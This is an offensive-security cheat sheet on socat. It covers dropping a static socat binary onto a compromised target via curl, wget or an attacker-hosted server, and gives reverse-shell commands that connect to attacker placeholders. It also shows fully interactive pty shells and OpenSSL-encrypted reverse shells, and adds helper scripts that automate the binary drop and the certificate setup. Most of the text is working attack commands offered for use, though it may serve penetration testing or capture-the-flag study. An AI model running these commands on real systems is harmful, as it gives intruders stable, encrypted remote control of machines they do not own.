socat
A shell obtained with basic tools such as netcat is often unstable: Ctrl+C kills the connection instead of the foreground command, Ctrl+Z suspends the listener, and there is no tab completion, line editing or job control. Socat is one alternative:
Socat is generally more stable on Linux targets than on Windows targets. It is not installed on most Linux systems by default, so it has to be brought in. Installing it with apt install or apt-get install is rarely an option: it needs root and a working package manager, pulls in dependencies, and leaves traces in the package logs.
Instead, a statically compiled binary (no shared-library dependencies) can be fetched straight from an HTTP URL onto the target with curl or wget. Link: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true
$ curl -L https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true --output /bin/socat
$ wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true -O /bin/socat
Note: curl needs -L because the ?raw=true link redirects to raw.githubusercontent.com; without it the file saved as socat is the redirect response, not the binary (wget follows redirects by default). Writing to /bin requires root. As an unprivileged user, save the file to a writable directory such as /tmp instead, mark it executable (chmod +x), and run it by full path: only directories listed in $PATH are searched when the name is typed on its own, so a binary dropped elsewhere will not be found as plain socat.
Hosting the binary on a publicly accessible attacker-controlled machine
The binary can also be hosted on another attacker-controlled machine on the internet, and be accessed via a simple Python web server running on that machine.
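The download steps above, as an added example that is not part of the original page: a small POSIX sh script that picks a directory the current user can write to, fetches the static binary with curl (following the redirect) or wget, refuses anything that is not an ELF file, and marks it executable. SOCAT_URL defaults to the GitHub link above; pointing it at an attacker-hosted server (for instance one started with python3 -m http.server) is assumed, not taken from the page. The function names and the SOCAT_INSTALL switch are this example's own choices.

```shell
#!/bin/sh
# Added example: fetch a static socat binary onto the target and check it before use.
# SOCAT_URL may be overridden with a URL on an attacker-controlled web server (assumption).
SOCAT_URL="${SOCAT_URL:-https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true}"

# pick_dest: first existing, writable candidate directory. /usr/local/bin and /bin
# only work as root; /tmp or $HOME are the usual unprivileged fallbacks, in which
# case the binary has to be run by explicit path rather than as plain "socat".
pick_dest() {
  for d in /usr/local/bin /bin /tmp "${HOME:-/tmp}"; do
    if [ -d "$d" ] && [ -w "$d" ]; then
      printf '%s/socat\n' "$d"
      return 0
    fi
  done
  return 1
}

# fetch URL OUT: curl needs -L because the ?raw=true link is a redirect to
# raw.githubusercontent.com; -f makes HTTP errors fail instead of saving an error page.
# wget follows redirects by default.
fetch() {
  url=$1
  out=$2
  if command -v curl >/dev/null 2>&1; then
    curl -fsSL "$url" -o "$out"
  elif command -v wget >/dev/null 2>&1; then
    wget -q "$url" -O "$out"
  else
    echo "neither curl nor wget available" >&2
    return 1
  fi
}

# is_elf FILE: the first four bytes of an ELF binary are 7f 45 4c 46.
# A saved HTML page, redirect body or "404" text fails this check.
is_elf() {
  [ "$(head -c 4 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# install_socat: download, validate, chmod +x, and print the path to run.
install_socat() {
  dest=$(pick_dest) || { echo "no writable directory found" >&2; return 1; }
  fetch "$SOCAT_URL" "$dest" || return 1
  if ! is_elf "$dest"; then
    echo "downloaded file is not an ELF binary, removing it" >&2
    rm -f "$dest"
    return 1
  fi
  chmod +x "$dest"
  echo "$dest"
}

# Run with SOCAT_INSTALL=1 to actually download; otherwise the script only
# defines the functions so they can be sourced or tested.
if [ "${SOCAT_INSTALL:-0}" = 1 ]; then
  install_socat
fi
```

The printed path is what to use in the socat commands that follow when the chosen directory is not on $PATH (for example /tmp/socat tcp:... rather than socat tcp:...).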
Reverse shell
Target machine (initiates the reverse shell connection)
$ socat tcp:[attacker_ip]:[attacker_port] EXEC:"bash -li"
Attacker machine (listening)
$ socat tcp-l:[listen_port] -
Best reverse shell experience
Target machine
$ socat TCP:<ATTACKER>:8888 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
$ socat TCP:<ATTACKER>:8888 EXEC:"cmd.exe",pty,stderr,sigint,setsid,sane
pty gives the shell a pseudo-terminal, stderr sends the shell's stderr down the same connection, sigint passes Ctrl+C on to the shell instead of killing socat, setsid puts the shell in its own session, and sane resets the terminal settings to a usable state. These are Unix options; the cmd.exe variant assumes a socat build running on the Windows target, where, as noted above, the result is less stable.
Attacker machine
$ socat tcp-l:8888 FILE:`tty`,raw,echo=0
FILE:`tty`,raw,echo=0 attaches the listener to the attacker's own terminal in raw mode with local echo off, so keystrokes (including Ctrl+C and tab) are passed through to the target's pty rather than handled locally. Because it needs a real terminal, this listener must be started from an interactive shell, not from a script or a pipe.
Encrypted shell with OpenSSL
Creating a self-signed certificate (on the attacker machine)
$ openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
req: creates a certificate request or, with the -x509 flag given here, a self-signed certificate.
-newkey rsa:2048: generates a new RSA private key of 2048 bits at the same time. -nodes leaves that key unencrypted, which socat needs in order to load it without a passphrase.
-keyout shell.key and -out shell.crt: where the private key and the certificate are written. -days 362 sets the certificate's validity period.
Merge the two created files shell.key and shell.crt into the single file shell.pem, which is what socat's cert= option expects (private key and certificate together):
$ cat shell.key shell.crt > shell.pem
Reverse shell
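The certificate steps above, as an added example that is not part of the original page: a POSIX sh script that generates the key and self-signed certificate with the same flags as the page (plus -subj so openssl does not prompt; the CN value "shell" is an arbitrary choice), builds shell.pem, checks that the bundle holds both the key and the certificate, and prints the certificate's SHA-256 fingerprint. The function names are this example's own. It expects the openssl command line tool to be installed.

```shell
#!/bin/sh
# Added example: build shell.pem for socat's cert= option and record the cert fingerprint.

# make_shell_pem DIR: key + self-signed cert (same flags as the page), then both
# concatenated into shell.pem. -subj "/CN=shell" avoids the interactive prompts;
# the CN is an arbitrary choice. The PEM contains the private key, so keep it 0600.
make_shell_pem() {
  dir=$1
  openssl req -newkey rsa:2048 -nodes -keyout "$dir/shell.key" \
      -x509 -days 362 -subj "/CN=shell" -out "$dir/shell.crt" 2>/dev/null || return 1
  cat "$dir/shell.key" "$dir/shell.crt" > "$dir/shell.pem" || return 1
  chmod 600 "$dir/shell.key" "$dir/shell.pem"
}

# pem_ok FILE: socat's cert= file must carry both the private key and the
# certificate, and the certificate must parse. A bundle built from only one of
# the two files (a common slip) fails here instead of failing at listen time.
pem_ok() {
  grep -q 'BEGIN .*PRIVATE KEY' "$1" \
    && grep -q 'BEGIN CERTIFICATE' "$1" \
    && openssl x509 -noout -in "$1" >/dev/null 2>&1
}

# cert_fingerprint CRT: SHA-256 fingerprint as colon-separated hex, without the
# "SHA256 Fingerprint=" prefix, so it can be compared or logged easily.
cert_fingerprint() {
  openssl x509 -noout -fingerprint -sha256 -in "$1" | sed 's/^.*=//'
}

# Usage on the attacker machine (commands, not run when the file is sourced):
#   make_shell_pem . && pem_ok shell.pem && cert_fingerprint shell.crt
#   socat openssl-listen:8888,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0
```

The fingerprint is worth keeping: with verify=0 on the target side the target checks nothing about the listener, so the shell goes to whoever holds the port. Where shell.crt can be copied to the target, socat can instead be told to trust only that certificate with cafile=shell.crt,verify=1; socat then also compares the certificate's CN with the connection target, which socat 1.7.3 and later let you override with openssl-commonname=shell (check the man page of the installed version before relying on that option).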
Listen on attacker machine
$ socat openssl-listen:<listen_port>,cert=shell.pem,verify=0 -
cert=shell.pem: the certificate and private key the listener presents to connecting clients.
verify=0: do not require or check a certificate from the peer (the target does not present one).
Connect from the target machine
$ socat openssl:<attacker_ip>:<attacker_port>,verify=0 EXEC:/bin/bash
On the target, verify=0 means the listener's certificate is not checked either: the traffic is encrypted, but the target hands its shell to whatever is listening on that address and port.
Stable encrypted reverse shell
Attacker
$ socat openssl-listen:<listen_port>,cert=<cert>,verify=0 FILE:`tty`,raw,echo=0
Target
$ socat openssl:<attacker_ip>:<attacker_port>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane